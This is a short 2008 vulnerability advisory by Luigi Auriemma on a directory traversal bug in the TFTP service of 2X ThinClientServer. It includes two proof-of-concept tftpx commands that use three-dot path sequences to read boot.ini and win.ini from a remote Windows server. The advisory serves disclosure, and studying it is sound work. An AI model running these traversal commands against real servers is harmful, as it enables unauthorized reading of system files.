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2X ThinClientServer v5.0_sp1-r3497 directory traversal
Directory traversal in 2X ThinClientServer v5.0_sp1-r3497
Directory traversal in 2X ThinClientServer v5.0_sp1-r3497


                             Luigi Auriemma

Application:  2X ThinClientServer
Versions:     <= v5.0_sp1-r3497
              (TFTPd.exe <=
Platforms:    Windows
Bug:          directory traversal
Exploitation: remote
Date:         29 Mar 2008
Author:       Luigi Auriemma
e-mail: aluigi@autistici.org 
              web:    aluigi.org


1) Introduction
2) Bug
3) The Code
4) Fix


==============1) Introduction

>From the manual:
"2X ThinClientServer allows you to deploy a thin client OS to low-cost
thin client devices and existing PCs, and centrally manage settings and
configure to which terminal servers (Windows or Linux) a user should
log on to."


=====2) Bug

The 2X TFTP Service enabled by default in ThinClientServer is affected
by a directory traversal vulnerability exploitable through the usage of
a sequence of 3 dots (instead of the classical two) for reaching the
various parent directories.


==========3) The Code


  tftpx SERVER .../.../.../.../.../.../boot.ini none
  tftpx SERVER ...\...\...\...\...\...\windows\win.ini none


=====4) Fix

No fix


Luigi Auriemma

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